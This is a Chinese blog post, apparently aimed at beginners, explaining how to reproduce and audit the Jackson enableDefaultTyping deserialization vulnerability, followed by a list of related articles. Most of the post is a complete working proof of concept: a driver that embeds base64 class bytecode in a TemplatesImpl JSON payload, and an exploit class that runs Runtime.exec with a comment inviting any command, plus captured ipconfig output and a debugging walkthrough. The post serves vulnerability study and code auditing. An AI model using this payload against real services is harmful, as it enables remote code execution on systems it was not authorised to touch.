1. JACKSON漏洞解析

poc代码:main.java

import com.fasterxml.jackson.databind.ObjectMapper;

import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;

import org.springframework.util.FileCopyUtils;

import java.io.ByteArrayOutputStream;

import java.io.File;

import java.io.FileInputStream;

import java.io.IOException;

/**

 * Created by Administrator on 2017/6/12.

 */

public class main {

    public static void main(String[] args)  {

        String MASIT_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

//改成exp存在的绝对路径

        String exp = readClassStr("D:\\workspace\\123\\target\\classes\\exp.class");

        String jsonInput = aposToQuotes("{\"object\":['com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',\n" +

                "{\n" +

                "'transletBytecodes':['"+exp+"'],\n" +

                "'transletName':'p',\n" +

                "'outputProperties':{}\n" +

                "}\n" +

                "]\n" +

                "}");

        System.out.printf(jsonInput);

        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        User user;

        try {

            user = mapper.readValue(jsonInput, User.class);

            System.out.println(user.getSex());

            System.out.println(user.getName());

        } catch (Exception e) {

            e.printStackTrace();

        }

    }

    public static String aposToQuotes(String json){

        return json.replace("'","\"");

    }

    public static String readClassStr(String cls){

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

        try {

            FileCopyUtils.copy(new FileInputStream(new File(cls)),byteArrayOutputStream);

        } catch (IOException e) {

            e.printStackTrace();

        }

        return Base64.encode(byteArrayOutputStream.toByteArray());

   }

}

exp.java



import com.sun.javaws.progress.Progress;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.*;

/**
 * Created by Administrator on 2017/6/12.
 */
public class exp extends AbstractTranslet {
    public exp() throws Exception {

        try {
            BufferedReader br = null;
            //修改成你想要执行的命令
            Process p = Runtime.getRuntime().exec("ipconfig");
            br = new BufferedReader(new InputStreamReader(p.getInputStream()));

            String line = null;
            StringBuilder sb = new StringBuilder();
            while ((line = br.readLine()) != null) {
                sb.append(line + "\n");
                System.out.println(sb);
            }
            File file = new File("result.txt");
            //File file =new File("javaio-appendfile.txt");

            //if file doesnt exists, then create it
            if(!file.exists()){
                file.createNewFile();
            }

            //true = append file
            FileWriter fileWritter = new FileWriter(file.getName(),true);
            BufferedWriter bufferWritter = new BufferedWriter(fileWritter);
            bufferWritter.write(sb.toString());
            bufferWritter.close();
            System.out.println(sb);
        } catch (IOException e) {
            e.printStackTrace();

        }
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}


 




user.java




import java.io.Serializable;

import java.util.Arrays;

import java.util.InputMismatchException;

import java.util.Objects;

/**

 * Created by Administrator on 2017/6/12.

 */

public class User {

    private Object object;

    public Object getObject() {

        return object;

    }

    public void setObject(Object object) {

        this.object = object;

    }

}




尝试执行:
发现result.txt中存在结果




Windows IP ����

��̫�������� �������� 2:

   ý��״̬  . . . . . . . . . . . . : ý���ѶϿ�

   �����ض��� DNS ��׺ . . . . . . . : 

��̫�������� Npcap Loopback Adapter:

   �����ض��� DNS ��׺ . . . . . . . :

   �������� IPv6 ��ַ. . . . . . . . : fe80::b047:25da:330b:45d4%18

   �Զ����� IPv4 ��ַ  . . . . . . . : 169.254.69.212

   ��������  . . . . . . . . . . . . : 255.255.0.0

   Ĭ�����. . . . . . . . . . . . . : 

��̫�������� ��������:

   �����ض��� DNS ��׺ . . . . . . . :

   �������� IPv6 ��ַ. . . . . . . . : fe80::fd81:27ba:8b8b:4a72%12

   IPv4 ��ַ . . . . . . . . . . . . : 10.0.83.198

   ��������  . . . . . . . . . . . . : 255.255.255.0

   Ĭ�����. . . . . . . . . . . . . : 10.0.83.1




调试本地代码:
由于Jackson中是通过readValue执行命令,
按F7进入当前函数:


跳过几次赋值,进入到当前函数,发现次函数中存在反序列化的赋值,按F7进行调试




经过多次调试发现,命令在标红处代码执行,并抛出异常




多部调试,F7进入函数代码(SetterlessProperty.java):




代码执行:




2. Jackson反序列化漏洞如何审计


OK,说到这就简单介绍了下,Jackson的反序列化代码运行的过程,那么现在代码审计中如何审计的出来项目是否包含Jackson反序列化呢?


第一步:看版本,如果Jackson的版本号不在存在漏洞的版本列表中,肯定不会有此漏洞,


版本列表:


Jackson 2.7版本(<2.7.10)


Jackson 2.8版本(<2.8.9)


第二步:你的Bean类中是否包含object类型的变量:


例如,我这边的User类中的Object变量定义为:private Object object


第三步:Jackson的ObjectMapper必须调用enableDefaultTyping:


ObjectMapper mapper = new ObjectMapper();


mapper.enableDefaultTyping();


满足以上三个要求,才能进行构造POC进行校验。
												


											
小白审计JACKSON反序列化漏洞的更多相关文章
	

    
								
  1. php反序列化漏洞复现
		
    超适合小白的php反序列化漏洞复现 写在前头的话 在OWASP TOP10中,反序列化已经榜上有名,但是究竟什么是反序列化,我觉得应该进下心来好好思考下.我觉得学习的时候,所有的问题都应该问3个问题: ...
    
		
    2. 
						
  2. ThinkPHP v6.0.x 反序列化漏洞利用
		
    前言: 上次做了成信大的安询杯第二届CTF比赛,遇到一个tp6的题,给了源码,目的是让通过pop链审计出反序列化漏洞. 这里总结一下tp6的反序列化漏洞的利用. 0x01环境搭建 现在tp新版本的官网 ...
    
		
    3. 
						
  3. [原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞]
		
    简介  原题复现:  考察知识点:反序列化.数组绕过  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组 ...
    
		
    4. 
						
  4. Java审计之CMS中的那些反序列化漏洞
		
    Java审计之CMS中的那些反序列化漏洞 0x00 前言 过年这段时间比较无聊,找了一套源码审计了一下,发现几个有意思的点拿出来给分享一下. 0x01 XStream 反序列化漏洞 下载源码下来发现并 ...
    
		
    5. 
						
  5. PHP审计之PHP反序列化漏洞
		
    PHP审计之PHP反序列化漏洞 前言 一直不懂,PHP反序列化感觉上比Java的反序列化难上不少.但归根结底还是serialize和unserialize中的一些问题. 在此不做多的介绍. 魔术方法  ...
    
		
    6. 
						
  6. php代码审计9审计反序列化漏洞
		
    序列化与反序列化:序列化:把对象转换为字节序列的过程称为对象的序列化反序列化:把字节序列恢复为对象的过程称为对象的反序列化 漏洞成因:反序列化对象中存在魔术方法,而且魔术方法中的代码可以被控制,漏洞根 ...
    
		
    7. 
						
  7. Java反序列化漏洞通用利用分析
		
    原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/ 博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重.长亭科技分析的非常细致 ...
    
		
    8. 
						
  8. Java反序列化漏洞分析
		
    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...
    
		
    9. 
						
  9. .NET高级代码审计(第五课) .NET Remoting反序列化漏洞
		
    0x00 前言 最近几天国外安全研究员Soroush Dalili (@irsdl)公布了.NET Remoting应用程序可能存在反序列化安全风险,当服务端使用HTTP信道中的SoapServerF ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. PMBOK 学习与实践分享视频
			
    本系列为自己在学习PMBOK时进行的总结与分享,每一节主要包括两部分: 对PMBOK本身的一个结构笔记和讲解. 对自己项目管理工作的一个总结和思考. PMBOK 学习与实践分享视频内容清单 人力资源管 ...
    
			
    2. 
						
  2. 推送一个已有的代码到新的 gerrit 服务器
			
    1.指定项目代码库中迭代列出全部ProductList(.git)到pro.log文件中 repo forall -c 'echo $REPO_PROJECT' | tee pro.log pro.l ...
    
			
    3. 
						
  3. office web apps 部署-搭建office web apps服务器
			
    二.搭建office web apps服务器 相关文件可以去焰尾迭分享的百度网盘下载,下载地址:http://pan.baidu.com/s/1o6tCo8y#path=%252Foffice%252 ...
    
			
    4. 
						
  4. Eclipse 如何添加Window Builder插件?
			
    http://www.eclipse.org/windowbuilder/download.php 找到对应版本的window builder 如果不知道版本的话,可以在你的Eclipse-help- ...
    
			
    5. 
						
  5. unity游戏设计之背包系统
			
    这次任务是模仿上图的样子,制作一个类似的背包系统. 上面的链接为:http://www.tasharen.com/ngui/exampleX.html 我们的目标是: 1.实现背包系统的UI界面 2. ...
    
			
    6. 
						
  6. 亲测可用!!!golang如何在idea中保存时自动进行代码格式化
			
    亲测可用,golang在idea中的代码自动格式化 1.ctrl+alt+s打开设置界面,选择[Plugins] -> [Install JetBrains plugin...] -> 搜 ...
    
			
    7. 
						
  7. Maven的简单搭建
			
    Maven这个个项目管理和构建自动化工具,越来越多的开发人员使用它来管理项目中的jar包.接下来将从下面几个方向介绍maven: (1)Maven简单介绍 (2)Maven安装与配置 (3)Maven ...
    
			
    8. 
						
  8. Unity 消息发送机制 解析
			
    该博客,只为解析,解析,解析,已经整理好,已经整理好,已经整理好.代码核心原理套用网上最流行的那一套,也是最常用游戏开发适用的消息机制.这里面加上自己的一些优化,极大的修正(哈哈),实测,没问题.万一 ...
    
			
    9. 
						
  9. 栈的Java简单实现
			
    关于栈 栈(Stack)是限定只能在一段进行插入和删除操作的线性表. 进行插入和删除操作的一端称为“栈顶”(top),另一端称为“栈底”(bottom). 栈的插入操作称为“入栈”(push),栈的删 ...
    
			
    10. 
						
  10. 模板方法模式(Tempalte Method Pattern)
			
    模板方法模式是类的行为模式.准备一个抽象类,将部分逻辑以具体方法以及具体构造函数的形式实现,然后声明一些抽象方法来迫使子类实现剩余的逻辑.不同的子类可以以不同的方式实现这些抽象方法,从而对剩余的逻辑有 ...
    
			
    11.